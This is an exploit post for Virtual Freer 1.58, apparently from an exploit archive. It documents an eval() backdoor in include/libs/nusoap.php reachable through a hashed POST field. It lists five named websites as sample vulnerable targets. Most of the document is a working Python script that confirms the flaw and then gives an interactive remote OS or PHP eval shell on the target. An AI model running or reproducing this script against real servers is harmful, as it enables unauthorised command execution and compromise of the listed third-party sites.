Virtual Freer version 1.58 suffers from a remote command execution vulnerability.
4fda13957d47f7876ce0abd3560a0604# Exploit title : Virtual Freer 1.58 - Remote Command Execution
# Exploit Author : SajjadBnd
# Date : 2020-02-17
# Vendor Homepage : http://freer.ir/virtual/
# Software Link : http://www.freer.ir/virtual/download.php?action=get
# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
# Tested on : Ubuntu 19.10
# Version : 1.58
############################
# [ DESCRIPTION ]
#
# Free Script For Sell Charging Cards and Virtual Products
#
# [POC]
#
# Vulnerable file: /include/libs/nusoap.php
# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
#
# POST /include/libs/nusoap.php
# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
#
# [ Sample Vulnerable Sites ]
#
# http://3cure.ir/buy/
# http://cheapcharger.ir/
# http://www.appraworld.ir/
# http://latoon.ir/
# http://novinv.ir/
#
import requests
import os
import sys
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
print '''
#################################################
# #
# Virtual Freer 1.58 - Remote Command Execution #
# SajjadBnd #
# BiskooitPedar #
# [email protected] #
#################################################
'''
def inputs():
target = raw_input('[*] URL : ')
while True:
try:
r = requests.get(target,verify=False)
start(target)
except requests.exceptions.MissingSchema:
target = "http://" + target
def start(target):
print "======================\n\n[!] Checking: ****()"
url = '%s/include/libs/nusoap.php' % (target)
body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
if 'vulnerable' in content:
print "[+] vulnerable: ****()\n"
else:
print "[-] Target not Vulnerable!"
sys.exit(1)
print "\n[!] Checking: System()"
body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.decode('utf-8')
if 'gid' in content:
print "[+] vulnerable: system()\n"
osshell(url)
else:
print "[-] Target not Vulnerable to Running OS Commands!"
evalshell(url)
def osshell(url):
print "======================\n[+] You can run os commands :D\n"
while True:
try:
cmd = raw_input('OS_SHELL $ ')
command = "system('%s');" % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] GoodBye :D"
sys.exit(1)
def evalshell(url):
print "======================\n[+] You can just run Eval Commands :D\n"
while True:
try:
cmd = raw_input('\nEval()=> ')
command = '%s;' % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] ok! GoodBye :D"
sys.exit(1)
if __name__ == '__main__':
clear()
Banner()
inputs()